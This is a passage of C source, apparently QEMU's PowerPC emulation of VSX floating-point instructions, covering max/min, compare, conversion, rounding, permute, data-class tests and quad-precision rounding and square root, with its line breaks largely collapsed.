CRF_LT; \ } else if (!float128_le(xa->f128, xb->f128, &env->fp_status)) { \ cc |= CRF_GT; \ } else { \ cc |= CRF_EQ; \ } \ \ env->fpscr &= ~FP_FPCC; \ env->fpscr |= cc << FPSCR_FPCC; \ env->crf[BF(opcode)] = cc; \ \ do_float_check_status(env, GETPC()); \ } VSX_SCALAR_CMPQ(xscmpoqp, 1) VSX_SCALAR_CMPQ(xscmpuqp, 0) /* * VSX_MAX_MIN - VSX floating point maximum/minimum * name - instruction mnemonic * op - operation (max or min) * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) */ #define VSX_MAX_MIN(name, op, nels, tp, fld) \ void helper_##name(CPUPPCState *env, ppc_vsr_t *xt, \ ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ for (i = 0; i < nels; i++) { \ t.fld = tp##_##op(xa->fld, xb->fld, &env->fp_status); \ if (unlikely(tp##_is_signaling_nan(xa->fld, &env->fp_status) || \ tp##_is_signaling_nan(xb->fld, &env->fp_status))) { \ float_invalid_op_vxsnan(env, GETPC()); \ } \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_MAX_MIN(xsmaxdp, maxnum, 1, float64, VsrD(0)) VSX_MAX_MIN(xvmaxdp, maxnum, 
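/*
 * (Illustrative note on the instantiations: maxnum/minnum follow the
 * IEEE 754-2008 *Num rules, so a quiet NaN in one operand is ignored
 * in favour of the numeric operand, e.g. maxnum(QNaN, 1.0) == 1.0;
 * only signalling NaNs trigger the VXSNAN check in the macro above.)
 */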
2, float64, VsrD(i)) VSX_MAX_MIN(xvmaxsp, maxnum, 4, float32, VsrW(i)) VSX_MAX_MIN(xsmindp, minnum, 1, float64, VsrD(0)) VSX_MAX_MIN(xvmindp, minnum, 2, float64, VsrD(i)) VSX_MAX_MIN(xvminsp, minnum, 4, float32, VsrW(i)) #define VSX_MAX_MINC(name, max) \ void helper_##name(CPUPPCState *env, uint32_t opcode, \ ppc_vsr_t *xt, ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ bool vxsnan_flag = false, vex_flag = false; \ \ if (unlikely(float64_is_any_nan(xa->VsrD(0)) || \ float64_is_any_nan(xb->VsrD(0)))) { \ if (float64_is_signaling_nan(xa->VsrD(0), &env->fp_status) || \ float64_is_signaling_nan(xb->VsrD(0), &env->fp_status)) { \ vxsnan_flag = true; \ } \ t.VsrD(0) = xb->VsrD(0); \ } else if ((max && \ !float64_lt(xa->VsrD(0), xb->VsrD(0), &env->fp_status)) || \ (!max && \ float64_lt(xa->VsrD(0), xb->VsrD(0), &env->fp_status))) { \ t.VsrD(0) = xa->VsrD(0); \ } else { \ t.VsrD(0) = xb->VsrD(0); \ } \ \ vex_flag = fpscr_ve & vxsnan_flag; \ if (vxsnan_flag) { \ float_invalid_op_vxsnan(env, GETPC()); \ } \ if (!vex_flag) { \ *xt = t; \ } \ } \ VSX_MAX_MINC(xsmaxcdp, 1); VSX_MAX_MINC(xsmincdp, 0); #define VSX_MAX_MINJ(name, max) \ void helper_##name(CPUPPCState *env, uint32_t opcode, \ ppc_vsr_t *xt, ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ bool vxsnan_flag = false, vex_flag = false; \ \ if (unlikely(float64_is_any_nan(xa->VsrD(0)))) { \ if (float64_is_signaling_nan(xa->VsrD(0), &env->fp_status)) { \ vxsnan_flag = true; \ } \ t.VsrD(0) = xa->VsrD(0); \ } else if (unlikely(float64_is_any_nan(xb->VsrD(0)))) { \ if (float64_is_signaling_nan(xb->VsrD(0), &env->fp_status)) { \ vxsnan_flag = true; \ } \ t.VsrD(0) = xb->VsrD(0); \ } else if (float64_is_zero(xa->VsrD(0)) && \ float64_is_zero(xb->VsrD(0))) { \ if (max) { \ if (!float64_is_neg(xa->VsrD(0)) || \ !float64_is_neg(xb->VsrD(0))) { \ t.VsrD(0) = 0ULL; \ } else { \ t.VsrD(0) = 0x8000000000000000ULL; \ } \ } else { \ if (float64_is_neg(xa->VsrD(0)) || \ float64_is_neg(xb->VsrD(0))) { \ t.VsrD(0) = 0x8000000000000000ULL; \ } else { \ t.VsrD(0) = 0ULL; \ } \ } \ } else if ((max && \ !float64_lt(xa->VsrD(0), xb->VsrD(0), &env->fp_status)) || \ (!max && \ float64_lt(xa->VsrD(0), xb->VsrD(0), &env->fp_status))) { \ t.VsrD(0) = xa->VsrD(0); \ } else { \ t.VsrD(0) = xb->VsrD(0); \ } \ \ vex_flag = fpscr_ve & vxsnan_flag; \ if (vxsnan_flag) { \ float_invalid_op_vxsnan(env, GETPC()); \ } \ if (!vex_flag) { \ *xt = t; \ } \ } \ VSX_MAX_MINJ(xsmaxjdp, 1); VSX_MAX_MINJ(xsminjdp, 0); /* * VSX_CMP - VSX floating point compare * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * cmp - comparison operation * svxvc - set VXVC bit * exp - expected result of comparison */ #define VSX_CMP(op, nels, tp, fld, cmp, svxvc, exp) \ uint32_t helper_##op(CPUPPCState *env, ppc_vsr_t *xt, \ ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ uint32_t crf6 = 0; \ int i; \ int all_true = 1; \ int all_false = 1; \ \ for (i = 0; i < nels; i++) { \ if (unlikely(tp##_is_any_nan(xa->fld) || \ tp##_is_any_nan(xb->fld))) { \ if (tp##_is_signaling_nan(xa->fld, &env->fp_status) || \ tp##_is_signaling_nan(xb->fld, &env->fp_status)) { \ float_invalid_op_vxsnan(env, GETPC()); \ } \ if (svxvc) { \ float_invalid_op_vxvc(env, 0, GETPC()); \ } \ t.fld = 0; \ all_true = 0; \ } else { \ if (tp##_##cmp(xb->fld, xa->fld, &env->fp_status) == exp) { \ t.fld = -1; \ all_false = 0; \ } else { \ t.fld = 0; \ all_true = 0; \ } \ } \ } \ \ *xt = t; \ crf6 = (all_true ? 
0x8 : 0) | (all_false ? 0x2 : 0); \ return crf6; \ } VSX_CMP(xvcmpeqdp, 2, float64, VsrD(i), eq, 0, 1) VSX_CMP(xvcmpgedp, 2, float64, VsrD(i), le, 1, 1) VSX_CMP(xvcmpgtdp, 2, float64, VsrD(i), lt, 1, 1) VSX_CMP(xvcmpnedp, 2, float64, VsrD(i), eq, 0, 0) VSX_CMP(xvcmpeqsp, 4, float32, VsrW(i), eq, 0, 1) VSX_CMP(xvcmpgesp, 4, float32, VsrW(i), le, 1, 1) VSX_CMP(xvcmpgtsp, 4, float32, VsrW(i), lt, 1, 1) VSX_CMP(xvcmpnesp, 4, float32, VsrW(i), eq, 0, 0) /* * VSX_CVT_FP_TO_FP - VSX floating point/floating point conversion * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * stp - source type (float32 or float64) * ttp - target type (float32 or float64) * sfld - source vsr_t field * tfld - target vsr_t field (f32 or f64) * sfprf - set FPRF */ #define VSX_CVT_FP_TO_FP(op, nels, stp, ttp, sfld, tfld, sfprf) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ for (i = 0; i < nels; i++) { \ t.tfld = stp##_to_##ttp(xb->sfld, &env->fp_status); \ if (unlikely(stp##_is_signaling_nan(xb->sfld, \ &env->fp_status))) { \ float_invalid_op_vxsnan(env, GETPC()); \ t.tfld = ttp##_snan_to_qnan(t.tfld); \ } \ if (sfprf) { \ helper_compute_fprf_##ttp(env, t.tfld); \ } \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_CVT_FP_TO_FP(xscvdpsp, 1, float64, float32, VsrD(0), VsrW(0), 1) VSX_CVT_FP_TO_FP(xscvspdp, 1, float32, float64, VsrW(0), VsrD(0), 1) VSX_CVT_FP_TO_FP(xvcvdpsp, 2, float64, float32, VsrD(i), VsrW(2 * i), 0) VSX_CVT_FP_TO_FP(xvcvspdp, 2, float32, float64, VsrW(2 * i), VsrD(i), 0) /* * VSX_CVT_FP_TO_FP_VECTOR - VSX floating point/floating point conversion * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * stp - source type (float32 or float64) * ttp - target type (float32 or float64) * sfld - source vsr_t field * tfld - target vsr_t field (f32 or f64) * sfprf - set FPRF */ #define VSX_CVT_FP_TO_FP_VECTOR(op, nels, stp, ttp, sfld, tfld, sfprf) \ void helper_##op(CPUPPCState *env, uint32_t opcode, \ ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ for (i = 0; i < nels; i++) { \ t.tfld = stp##_to_##ttp(xb->sfld, &env->fp_status); \ if (unlikely(stp##_is_signaling_nan(xb->sfld, \ &env->fp_status))) { \ float_invalid_op_vxsnan(env, GETPC()); \ t.tfld = ttp##_snan_to_qnan(t.tfld); \ } \ if (sfprf) { \ helper_compute_fprf_##ttp(env, t.tfld); \ } \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_CVT_FP_TO_FP_VECTOR(xscvdpqp, 1, float64, float128, VsrD(0), f128, 1) /* * VSX_CVT_FP_TO_FP_HP - VSX floating point/floating point conversion * involving one half precision value * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * stp - source type * ttp - target type * sfld - source vsr_t field * tfld - target vsr_t field * sfprf - set FPRF */ #define VSX_CVT_FP_TO_FP_HP(op, nels, stp, ttp, sfld, tfld, sfprf) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = { 0 }; \ int i; \ \ for (i = 0; i < nels; i++) { \ t.tfld = stp##_to_##ttp(xb->sfld, 1, &env->fp_status); \ if (unlikely(stp##_is_signaling_nan(xb->sfld, \ &env->fp_status))) { \ float_invalid_op_vxsnan(env, GETPC()); \ t.tfld = ttp##_snan_to_qnan(t.tfld); \ } \ if (sfprf) { \ helper_compute_fprf_##ttp(env, t.tfld); \ } \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_CVT_FP_TO_FP_HP(xscvdphp, 1, float64, float16, VsrD(0), VsrH(3), 1) VSX_CVT_FP_TO_FP_HP(xscvhpdp, 1, float16, float64, VsrH(3), VsrD(0), 1) VSX_CVT_FP_TO_FP_HP(xvcvsphp, 4, float32, float16, VsrW(i), 
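/*
 * (Lane-mapping sketch for xvcvsphp/xvcvhpsp: with the big-endian
 * element numbering used by VsrH/VsrW, word element i spans halfwords
 * 2*i (high) and 2*i+1 (low), so the VsrH(2 * i + 1) field places each
 * converted float16 in the low 16 bits of its word while the high
 * halfword stays zero from t = { 0 }.)
 */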
VsrH(2 * i + 1), 0) VSX_CVT_FP_TO_FP_HP(xvcvhpsp, 4, float16, float32, VsrH(2 * i + 1), VsrW(i), 0) /* * xscvqpdp isn't using VSX_CVT_FP_TO_FP() because xscvqpdpo will be * added to this later. */ void helper_xscvqpdp(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xt, ppc_vsr_t *xb) { ppc_vsr_t t = { 0 }; float_status tstat; tstat = env->fp_status; if (unlikely(Rc(opcode) != 0)) { tstat.float_rounding_mode = float_round_to_odd; } t.VsrD(0) = float128_to_float64(xb->f128, &tstat); env->fp_status.float_exception_flags |= tstat.float_exception_flags; if (unlikely(float128_is_signaling_nan(xb->f128, &tstat))) { float_invalid_op_vxsnan(env, GETPC()); t.VsrD(0) = float64_snan_to_qnan(t.VsrD(0)); } helper_compute_fprf_float64(env, t.VsrD(0)); *xt = t; do_float_check_status(env, GETPC()); } uint64_t helper_xscvdpspn(CPUPPCState *env, uint64_t xb) { uint64_t result, sign, exp, frac; float_status tstat = env->fp_status; set_float_exception_flags(0, &tstat); sign = extract64(xb, 63, 1); exp = extract64(xb, 52, 11); frac = extract64(xb, 0, 52) | 0x10000000000000ULL; if (unlikely(exp == 0 && extract64(frac, 0, 52) != 0)) { /* DP denormal operand. */ /* Exponent override to DP min exp. */ exp = 1; /* Implicit bit override to 0. */ frac = deposit64(frac, 53, 1, 0); } if (unlikely(exp < 897 && frac != 0)) { /* SP tiny operand. */ if (897 - exp > 63) { frac = 0; } else { /* Denormalize until exp = SP min exp. */ frac >>= (897 - exp); } /* Exponent override to SP min exp - 1. */ exp = 896; } result = sign << 31; result |= extract64(exp, 10, 1) << 30; result |= extract64(exp, 0, 7) << 23; result |= extract64(frac, 29, 23); /* hardware replicates result to both words of the doubleword result. */ return (result << 32) | result; } uint64_t helper_xscvspdpn(CPUPPCState *env, uint64_t xb) { float_status tstat = env->fp_status; set_float_exception_flags(0, &tstat); return float32_to_float64(xb >> 32, &tstat); } /* * VSX_CVT_FP_TO_INT - VSX floating point to integer conversion * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * stp - source type (float32 or float64) * ttp - target type (int32, uint32, int64 or uint64) * sfld - source vsr_t field * tfld - target vsr_t field * rnan - resulting NaN */ #define VSX_CVT_FP_TO_INT(op, nels, stp, ttp, sfld, tfld, rnan) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ int all_flags = env->fp_status.float_exception_flags, flags; \ ppc_vsr_t t = *xt; \ int i; \ \ for (i = 0; i < nels; i++) { \ env->fp_status.float_exception_flags = 0; \ t.tfld = stp##_to_##ttp##_round_to_zero(xb->sfld, &env->fp_status); \ flags = env->fp_status.float_exception_flags; \ if (unlikely(flags & float_flag_invalid)) { \ float_invalid_cvt(env, 0, GETPC(), stp##_classify(xb->sfld)); \ t.tfld = rnan; \ } \ all_flags |= flags; \ } \ \ *xt = t; \ env->fp_status.float_exception_flags = all_flags; \ do_float_check_status(env, GETPC()); \ } VSX_CVT_FP_TO_INT(xscvdpsxds, 1, float64, int64, VsrD(0), VsrD(0), \ 0x8000000000000000ULL) VSX_CVT_FP_TO_INT(xscvdpsxws, 1, float64, int32, VsrD(0), VsrW(1), \ 0x80000000U) VSX_CVT_FP_TO_INT(xscvdpuxds, 1, float64, uint64, VsrD(0), VsrD(0), 0ULL) VSX_CVT_FP_TO_INT(xscvdpuxws, 1, float64, uint32, VsrD(0), VsrW(1), 0U) VSX_CVT_FP_TO_INT(xvcvdpsxds, 2, float64, int64, VsrD(i), VsrD(i), \ 0x8000000000000000ULL) VSX_CVT_FP_TO_INT(xvcvdpsxws, 2, float64, int32, VsrD(i), VsrW(2 * i), \ 0x80000000U) VSX_CVT_FP_TO_INT(xvcvdpuxds, 2, float64, uint64, VsrD(i), VsrD(i), 0ULL) VSX_CVT_FP_TO_INT(xvcvdpuxws, 2, float64, uint32, VsrD(i), VsrW(2 
* i), 0U) VSX_CVT_FP_TO_INT(xvcvspsxds, 2, float32, int64, VsrW(2 * i), VsrD(i), \ 0x8000000000000000ULL) VSX_CVT_FP_TO_INT(xvcvspsxws, 4, float32, int32, VsrW(i), VsrW(i), 0x80000000U) VSX_CVT_FP_TO_INT(xvcvspuxds, 2, float32, uint64, VsrW(2 * i), VsrD(i), 0ULL) VSX_CVT_FP_TO_INT(xvcvspuxws, 4, float32, uint32, VsrW(i), VsrW(i), 0U) /* * VSX_CVT_FP_TO_INT_VECTOR - VSX floating point to integer conversion * op - instruction mnemonic * stp - source type (float32 or float64) * ttp - target type (int32, uint32, int64 or uint64) * sfld - source vsr_t field * tfld - target vsr_t field * rnan - resulting NaN */ #define VSX_CVT_FP_TO_INT_VECTOR(op, stp, ttp, sfld, tfld, rnan) \ void helper_##op(CPUPPCState *env, uint32_t opcode, \ ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = { 0 }; \ \ t.tfld = stp##_to_##ttp##_round_to_zero(xb->sfld, &env->fp_status); \ if (env->fp_status.float_exception_flags & float_flag_invalid) { \ float_invalid_cvt(env, 0, GETPC(), stp##_classify(xb->sfld)); \ t.tfld = rnan; \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_CVT_FP_TO_INT_VECTOR(xscvqpsdz, float128, int64, f128, VsrD(0), \ 0x8000000000000000ULL) VSX_CVT_FP_TO_INT_VECTOR(xscvqpswz, float128, int32, f128, VsrD(0), \ 0xffffffff80000000ULL) VSX_CVT_FP_TO_INT_VECTOR(xscvqpudz, float128, uint64, f128, VsrD(0), 0x0ULL) VSX_CVT_FP_TO_INT_VECTOR(xscvqpuwz, float128, uint32, f128, VsrD(0), 0x0ULL) /* * VSX_CVT_INT_TO_FP - VSX integer to floating point conversion * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * stp - source type (int32, uint32, int64 or uint64) * ttp - target type (float32 or float64) * sfld - source vsr_t field * tfld - target vsr_t field * jdef - definition of the j index (i or 2*i) * sfprf - set FPRF */ #define VSX_CVT_INT_TO_FP(op, nels, stp, ttp, sfld, tfld, sfprf, r2sp) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ for (i = 0; i < nels; i++) { \ t.tfld = stp##_to_##ttp(xb->sfld, &env->fp_status); \ if (r2sp) { \ t.tfld = helper_frsp(env, t.tfld); \ } \ if (sfprf) { \ helper_compute_fprf_float64(env, t.tfld); \ } \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_CVT_INT_TO_FP(xscvsxddp, 1, int64, float64, VsrD(0), VsrD(0), 1, 0) VSX_CVT_INT_TO_FP(xscvuxddp, 1, uint64, float64, VsrD(0), VsrD(0), 1, 0) VSX_CVT_INT_TO_FP(xscvsxdsp, 1, int64, float64, VsrD(0), VsrD(0), 1, 1) VSX_CVT_INT_TO_FP(xscvuxdsp, 1, uint64, float64, VsrD(0), VsrD(0), 1, 1) VSX_CVT_INT_TO_FP(xvcvsxddp, 2, int64, float64, VsrD(i), VsrD(i), 0, 0) VSX_CVT_INT_TO_FP(xvcvuxddp, 2, uint64, float64, VsrD(i), VsrD(i), 0, 0) VSX_CVT_INT_TO_FP(xvcvsxwdp, 2, int32, float64, VsrW(2 * i), VsrD(i), 0, 0) VSX_CVT_INT_TO_FP(xvcvuxwdp, 2, uint64, float64, VsrW(2 * i), VsrD(i), 0, 0) VSX_CVT_INT_TO_FP(xvcvsxdsp, 2, int64, float32, VsrD(i), VsrW(2 * i), 0, 0) VSX_CVT_INT_TO_FP(xvcvuxdsp, 2, uint64, float32, VsrD(i), VsrW(2 * i), 0, 0) VSX_CVT_INT_TO_FP(xvcvsxwsp, 4, int32, float32, VsrW(i), VsrW(i), 0, 0) VSX_CVT_INT_TO_FP(xvcvuxwsp, 4, uint32, float32, VsrW(i), VsrW(i), 0, 0) /* * VSX_CVT_INT_TO_FP_VECTOR - VSX integer to floating point conversion * op - instruction mnemonic * stp - source type (int32, uint32, int64 or uint64) * ttp - target type (float32 or float64) * sfld - source vsr_t field * tfld - target vsr_t field */ #define VSX_CVT_INT_TO_FP_VECTOR(op, stp, ttp, sfld, tfld) \ void helper_##op(CPUPPCState *env, uint32_t opcode, \ ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ \ t.tfld = stp##_to_##ttp(xb->sfld, 
&env->fp_status); \ helper_compute_fprf_##ttp(env, t.tfld); \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_CVT_INT_TO_FP_VECTOR(xscvsdqp, int64, float128, VsrD(0), f128) VSX_CVT_INT_TO_FP_VECTOR(xscvudqp, uint64, float128, VsrD(0), f128) /* * For "use current rounding mode", define a value that will not be * one of the existing rounding model enums. */ #define FLOAT_ROUND_CURRENT (float_round_nearest_even + float_round_down + \ float_round_up + float_round_to_zero) /* * VSX_ROUND - VSX floating point round * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * rmode - rounding mode * sfprf - set FPRF */ #define VSX_ROUND(op, nels, tp, fld, rmode, sfprf) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ if (rmode != FLOAT_ROUND_CURRENT) { \ set_float_rounding_mode(rmode, &env->fp_status); \ } \ \ for (i = 0; i < nels; i++) { \ if (unlikely(tp##_is_signaling_nan(xb->fld, \ &env->fp_status))) { \ float_invalid_op_vxsnan(env, GETPC()); \ t.fld = tp##_snan_to_qnan(xb->fld); \ } else { \ t.fld = tp##_round_to_int(xb->fld, &env->fp_status); \ } \ if (sfprf) { \ helper_compute_fprf_float64(env, t.fld); \ } \ } \ \ /* \ * If this is not a "use current rounding mode" instruction, \ * then inhibit setting of the XX bit and restore rounding \ * mode from FPSCR \ */ \ if (rmode != FLOAT_ROUND_CURRENT) { \ fpscr_set_rounding_mode(env); \ env->fp_status.float_exception_flags &= ~float_flag_inexact; \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_ROUND(xsrdpi, 1, float64, VsrD(0), float_round_ties_away, 1) VSX_ROUND(xsrdpic, 1, float64, VsrD(0), FLOAT_ROUND_CURRENT, 1) VSX_ROUND(xsrdpim, 1, float64, VsrD(0), float_round_down, 1) VSX_ROUND(xsrdpip, 1, float64, VsrD(0), float_round_up, 1) VSX_ROUND(xsrdpiz, 1, float64, VsrD(0), float_round_to_zero, 1) VSX_ROUND(xvrdpi, 2, float64, VsrD(i), float_round_ties_away, 0) VSX_ROUND(xvrdpic, 2, float64, VsrD(i), FLOAT_ROUND_CURRENT, 0) VSX_ROUND(xvrdpim, 2, float64, VsrD(i), float_round_down, 0) VSX_ROUND(xvrdpip, 2, float64, VsrD(i), float_round_up, 0) VSX_ROUND(xvrdpiz, 2, float64, VsrD(i), float_round_to_zero, 0) VSX_ROUND(xvrspi, 4, float32, VsrW(i), float_round_ties_away, 0) VSX_ROUND(xvrspic, 4, float32, VsrW(i), FLOAT_ROUND_CURRENT, 0) VSX_ROUND(xvrspim, 4, float32, VsrW(i), float_round_down, 0) VSX_ROUND(xvrspip, 4, float32, VsrW(i), float_round_up, 0) VSX_ROUND(xvrspiz, 4, float32, VsrW(i), float_round_to_zero, 0) uint64_t helper_xsrsp(CPUPPCState *env, uint64_t xb) { helper_reset_fpstatus(env); uint64_t xt = helper_frsp(env, xb); helper_compute_fprf_float64(env, xt); do_float_check_status(env, GETPC()); return xt; } #define VSX_XXPERM(op, indexed) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, \ ppc_vsr_t *xa, ppc_vsr_t *pcv) \ { \ ppc_vsr_t t = *xt; \ int i, idx; \ \ for (i = 0; i < 16; i++) { \ idx = pcv->VsrB(i) & 0x1F; \ if (indexed) { \ idx = 31 - idx; \ } \ t.VsrB(i) = (idx <= 15) ? 
xa->VsrB(idx) \ : xt->VsrB(idx - 16); \ } \ *xt = t; \ } VSX_XXPERM(xxperm, 0) VSX_XXPERM(xxpermr, 1) void helper_xvxsigsp(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb) { ppc_vsr_t t = { 0 }; uint32_t exp, i, fraction; for (i = 0; i < 4; i++) { exp = (xb->VsrW(i) >> 23) & 0xFF; fraction = xb->VsrW(i) & 0x7FFFFF; if (exp != 0 && exp != 255) { t.VsrW(i) = fraction | 0x00800000; } else { t.VsrW(i) = fraction; } } *xt = t; } /* * VSX_TEST_DC - VSX floating point test data class * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * xbn - VSR register number * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * tfld - target vsr_t field (VsrD(*) or VsrW(*)) * fld_max - target field max * scrf - set result in CR and FPCC */ #define VSX_TEST_DC(op, nels, xbn, tp, fld, tfld, fld_max, scrf) \ void helper_##op(CPUPPCState *env, uint32_t opcode) \ { \ ppc_vsr_t *xt = &env->vsr[xT(opcode)]; \ ppc_vsr_t *xb = &env->vsr[xbn]; \ ppc_vsr_t t = { 0 }; \ uint32_t i, sign, dcmx; \ uint32_t cc, match = 0; \ \ if (!scrf) { \ dcmx = DCMX_XV(opcode); \ } else { \ t = *xt; \ dcmx = DCMX(opcode); \ } \ \ for (i = 0; i < nels; i++) { \ sign = tp##_is_neg(xb->fld); \ if (tp##_is_any_nan(xb->fld)) { \ match = extract32(dcmx, 6, 1); \ } else if (tp##_is_infinity(xb->fld)) { \ match = extract32(dcmx, 4 + !sign, 1); \ } else if (tp##_is_zero(xb->fld)) { \ match = extract32(dcmx, 2 + !sign, 1); \ } else if (tp##_is_zero_or_denormal(xb->fld)) { \ match = extract32(dcmx, 0 + !sign, 1); \ } \ \ if (scrf) { \ cc = sign << CRF_LT_BIT | match << CRF_EQ_BIT; \ env->fpscr &= ~FP_FPCC; \ env->fpscr |= cc << FPSCR_FPCC; \ env->crf[BF(opcode)] = cc; \ } else { \ t.tfld = match ? fld_max : 0; \ } \ match = 0; \ } \ if (!scrf) { \ *xt = t; \ } \ } VSX_TEST_DC(xvtstdcdp, 2, xB(opcode), float64, VsrD(i), VsrD(i), UINT64_MAX, 0) VSX_TEST_DC(xvtstdcsp, 4, xB(opcode), float32, VsrW(i), VsrW(i), UINT32_MAX, 0) VSX_TEST_DC(xststdcdp, 1, xB(opcode), float64, VsrD(0), VsrD(0), 0, 1) VSX_TEST_DC(xststdcqp, 1, (rB(opcode) + 32), float128, f128, VsrD(0), 0, 1) void helper_xststdcsp(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xb) { uint32_t dcmx, sign, exp; uint32_t cc, match = 0, not_sp = 0; dcmx = DCMX(opcode); exp = (xb->VsrD(0) >> 52) & 0x7FF; sign = float64_is_neg(xb->VsrD(0)); if (float64_is_any_nan(xb->VsrD(0))) { match = extract32(dcmx, 6, 1); } else if (float64_is_infinity(xb->VsrD(0))) { match = extract32(dcmx, 4 + !sign, 1); } else if (float64_is_zero(xb->VsrD(0))) { match = extract32(dcmx, 2 + !sign, 1); } else if (float64_is_zero_or_denormal(xb->VsrD(0)) || (exp > 0 && exp < 0x381)) { match = extract32(dcmx, 0 + !sign, 1); } not_sp = !float64_eq(xb->VsrD(0), float32_to_float64( float64_to_float32(xb->VsrD(0), &env->fp_status), &env->fp_status), &env->fp_status); cc = sign << CRF_LT_BIT | match << CRF_EQ_BIT | not_sp << CRF_SO_BIT; env->fpscr &= ~FP_FPCC; env->fpscr |= cc << FPSCR_FPCC; env->crf[BF(opcode)] = cc; } void helper_xsrqpi(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xt, ppc_vsr_t *xb) { ppc_vsr_t t = { 0 }; uint8_t r = Rrm(opcode); uint8_t ex = Rc(opcode); uint8_t rmc = RMC(opcode); uint8_t rmode = 0; float_status tstat; helper_reset_fpstatus(env); if (r == 0 && rmc == 0) { rmode = float_round_ties_away; } else if (r == 0 && rmc == 0x3) { rmode = fpscr_rn; } else if (r == 1) { switch (rmc) { case 0: rmode = float_round_nearest_even; break; case 1: rmode = float_round_to_zero; break; case 2: rmode = float_round_up; break; case 3: rmode = float_round_down; break; default: abort(); } 
} tstat = env->fp_status; set_float_exception_flags(0, &tstat); set_float_rounding_mode(rmode, &tstat); t.f128 = float128_round_to_int(xb->f128, &tstat); env->fp_status.float_exception_flags |= tstat.float_exception_flags; if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { if (float128_is_signaling_nan(xb->f128, &tstat)) { float_invalid_op_vxsnan(env, GETPC()); t.f128 = float128_snan_to_qnan(t.f128); } } if (ex == 0 && (tstat.float_exception_flags & float_flag_inexact)) { env->fp_status.float_exception_flags &= ~float_flag_inexact; } helper_compute_fprf_float128(env, t.f128); do_float_check_status(env, GETPC()); *xt = t; } void helper_xsrqpxp(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xt, ppc_vsr_t *xb) { ppc_vsr_t t = { 0 }; uint8_t r = Rrm(opcode); uint8_t rmc = RMC(opcode); uint8_t rmode = 0; floatx80 round_res; float_status tstat; helper_reset_fpstatus(env); if (r == 0 && rmc == 0) { rmode = float_round_ties_away; } else if (r == 0 && rmc == 0x3) { rmode = fpscr_rn; } else if (r == 1) { switch (rmc) { case 0: rmode = float_round_nearest_even; break; case 1: rmode = float_round_to_zero; break; case 2: rmode = float_round_up; break; case 3: rmode = float_round_down; break; default: abort(); } } tstat = env->fp_status; set_float_exception_flags(0, &tstat); set_float_rounding_mode(rmode, &tstat); round_res = float128_to_floatx80(xb->f128, &tstat); t.f128 = floatx80_to_float128(round_res, &tstat); env->fp_status.float_exception_flags |= tstat.float_exception_flags; if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { if (float128_is_signaling_nan(xb->f128, &tstat)) { float_invalid_op_vxsnan(env, GETPC()); t.f128 = float128_snan_to_qnan(t.f128); } } helper_compute_fprf_float128(env, t.f128); *xt = t; do_float_check_status(env, GETPC()); } void helper_xssqrtqp(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xt, ppc_vsr_t *xb) { ppc_vsr_t t = { 0 }; float_status tstat; helper_reset_fpstatus(env); tstat = env->fp_status; if (unlikely(Rc(opcode) != 0)) { tstat.float_rounding_mode = float_round_to_odd; } set_float_exception_flags(0, &tstat); t.f128 = float128_sqrt(xb->f128, &tstat); env->fp_status.float_exception_flags |= tstat.float_exception_flags; if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { if (float128_is_signaling_nan(xb->f128, &tstat)) { float_invalid_op_vxsnan(env, GETPC()); t.f128 = float128_snan_to_qnan(xb->f128); } else if (float128_is_quiet_nan(xb->f128, &tstat)) { t.f128 = xb->f128; } else if (float128_is_neg(xb->f128) && !float128_is_zero(xb->f128)) { float_invalid_op_vxsqrt(env, 1, GETPC()); t.f128 = float128_default_nan(&env->fp_status); } } helper_compute_fprf_float128(env, t.f128); *xt = t; 